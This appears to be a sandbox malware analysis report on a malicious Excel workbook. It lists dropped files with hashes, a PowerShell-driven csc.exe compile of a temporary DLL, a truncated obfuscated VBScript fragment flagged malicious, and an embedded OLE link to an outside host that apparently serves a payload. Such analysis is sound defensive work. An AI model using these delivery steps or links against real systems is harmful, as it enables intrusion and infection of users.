                                                                                                                                                                              SHA-512:780EA417EF0B4CBB2CBC7F9212F6B5D6473CFEDFE9CCBC8644D96CF878B88EB7B0656431A57A4BB4626E375250B4B7CED4CCE61CD935E34CDD30A3A122DA6AF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):195824
                                                                                                                                                                              Entropy (8bit):3.733217557919086
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                                                                                                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                                                                                                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                                                                                                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                                                                                                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                                                                                                                                              Malicious:true
Preview:
private function almecegueira(fluctuador, desvariar, miliciano, moansa, hemiatrophia)
    dim filter
    dim dialect
    dim e
    dim res
    dim formattedText
    dim flags

    flags = 0

    if miliciano.ArgumentExists(NPARA_FILTER) then
        filter = miliciano.Argument(NPARA_FILTER)
        dialect = URI_WQL_DIALECT
    end if

    if miliciano.ArgumentExists(NPARA_DIALECT) then
        dialect = miliciano.Argument(NPARA_DIALECT)
    end if

    If LC
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):859136
                                                                                                                                                                              Entropy (8bit):7.024977112991656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:6mzHJE+CzldlD3DERnLRmF8DMJhujh3LRG1XjPA81Q/QGMIBnAuyg:9czlfbARM8oyh39CJQCIBnB
                                                                                                                                                                              MD5:0A31EC61263C5314630727809D3D2477
                                                                                                                                                                              SHA1:FDA439EDED176E48019DCE272CB2C2586D3B212F
                                                                                                                                                                              SHA-256:062A7CF8CBF14B1BDB6F5D201C39F7F2CFF1BC975E0C80E6A1259DF6B2D69697
                                                                                                                                                                              SHA-512:1506A3957B20DF7BAFF420E7B1EDB8D10FF03A48EE46EF1E2D8B7CF2B64BDEFE31A986AFE70E3FF84F76789F8862F684DBAE08A3E5684B008875D786A9401E73
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):859136
                                                                                                                                                                              Entropy (8bit):7.024977112991656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:6mzHJE+CzldlD3DERnLRmF8DMJhujh3LRG1XjPA81Q/QGMIBnAuyg:9czlfbARM8oyh39CJQCIBnB
                                                                                                                                                                              MD5:0A31EC61263C5314630727809D3D2477
                                                                                                                                                                              SHA1:FDA439EDED176E48019DCE272CB2C2586D3B212F
                                                                                                                                                                              SHA-256:062A7CF8CBF14B1BDB6F5D201C39F7F2CFF1BC975E0C80E6A1259DF6B2D69697
                                                                                                                                                                              SHA-512:1506A3957B20DF7BAFF420E7B1EDB8D10FF03A48EE46EF1E2D8B7CF2B64BDEFE31A986AFE70E3FF84F76789F8862F684DBAE08A3E5684B008875D786A9401E73
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 06:22:49 2024, Security: 1
                                                                                                                                                                              Entropy (8bit):6.9981022492095
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                              File name:037002451082_10142024.xls
                                                                                                                                                                              File size:868'352 bytes
                                                                                                                                                                              MD5:0a3e3fee911e89820e0f428e31f8e0ac
                                                                                                                                                                              SHA1:0000692437d8054df2c2ded80c4c35f6de07a6a0
                                                                                                                                                                              SHA256:8087bbe34f6bd622a82115c7653470d15ec77183b5cb82e1996fb170b1ace01f
                                                                                                                                                                              SHA512:25eb3013c07b7b5dc300ce5275e319e604b54d4a573985d913abcb5462f25bbe618824c4dede834005af077d7aab15df29d668806dbb30ed0dc82d6ac48f5bef
                                                                                                                                                                              SSDEEP:12288:fmzHJE+CzldhD3DERnLRmF8D5Jhuia3LjxN5nRXPZqe:WczlzbARM8dTa3JN3f/
                                                                                                                                                                              TLSH:97059DD3AA2D4F25CD850230A6F3476A1724DC83C626472B12F477687AFBAD43946F8D
                                                                                                                                                                              Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                              Number of OLE Files:1
                                                                                                                                                                              Has Summary Info:
                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                              Encrypted Document:True
                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                              Contains ObjectPool Stream:False
                                                                                                                                                                              Flash Objects Count:0
                                                                                                                                                                              Contains VBA Macros:True
                                                                                                                                                                              Code Page:1252
                                                                                                                                                                              Author:
                                                                                                                                                                              Last Saved By:
                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                              Last Saved Time:2024-10-14 05:22:49
                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                              Security:1
                                                                                                                                                                              Document Code Page:1252
                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                              Shared Document:False
                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                              Application Version:786432
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                              VBA File Name:Sheet1.cls
                                                                                                                                                                              Stream Size:977
                                                                                                                                                                              Attribute VB_Name = "Sheet1"
                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                              

                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                              VBA File Name:Sheet2.cls
                                                                                                                                                                              Stream Size:977
                                                                                                                                                                              Attribute VB_Name = "Sheet2"
                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                              

                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                              VBA File Name:Sheet3.cls
                                                                                                                                                                              Stream Size:977
                                                                                                                                                                              Attribute VB_Name = "Sheet3"
                                                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                              

                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                                                                                                              Stream Size:985
                                                                                                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                                                              Attribute VB_Exposed = True
                                                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                                                              

                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:244
                                                                                                                                                                              Entropy:2.889430592781307
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:200
                                                                                                                                                                              Entropy:3.2920681057018664
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/\x5DocumentSummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:244
                                                                                                                                                                              Entropy:2.701136490257069
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/\x5SummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                              Stream Size:90976
                                                                                                                                                                              Entropy:2.0342284920522364
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0018D4CE/\x1Ole
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:20
                                                                                                                                                                              Entropy:0.5689955935892812
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:4
                                                                                                                                                                              Entropy:0.8112781244591328
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . .
                                                                                                                                                                              Data Raw:00 00 03 00
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0018D4CE/Contents
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                              Stream Size:197671
                                                                                                                                                                              Entropy:6.989042939766534
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00253C98/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.219515110876372
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00253C98/Package
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                                              Stream Size:18455
                                                                                                                                                                              Entropy:7.496042748332497
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:P K . . . . . . . . . . ! . 3 [ . . . H . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00254B5A/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.219515110876372
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD00254B5A/Package
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                                              Stream Size:22238
                                                                                                                                                                              Entropy:7.613241301603683
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:P K . . . . . . . . . . ! . . z > . . . 8 . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/\x1CompObj
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:114
                                                                                                                                                                              Entropy:4.25248375192737
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/\x5DocumentSummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:484
                                                                                                                                                                              Entropy:3.922883556049869
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/\x5SummaryInformation
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:19956
                                                                                                                                                                              Entropy:3.0467651148991917
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . D . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/Workbook
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                              Stream Size:95624
                                                                                                                                                                              Entropy:3.890226646734135
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/Workbook
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                              Stream Size:170317
                                                                                                                                                                              Entropy:7.463658349807208
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA1/\x1Ole
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:902
                                                                                                                                                                              Entropy:5.554474880156939
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . w r h , } . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . j . f . m . . . c . o . m . . . c . o . / . k . 3 . l . ? . & . a . l . l . o . y . = . h . a . n . d . s . o . m . e . & . c . o . n . v . e . c . t . i . o . n . = . p . a . n . i . c . k . y . & . a . c . i . d . = . g . i . d . d . y . & . p . o . s . i . t . i . o . n . = . a . b . s . o . r . b . i . n . g . & . r . e . g . u . l . a . r . = . o . r . a . n . g . e . & . d . a . t . a . b . a . s . e . =
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                              Stream Size:226244
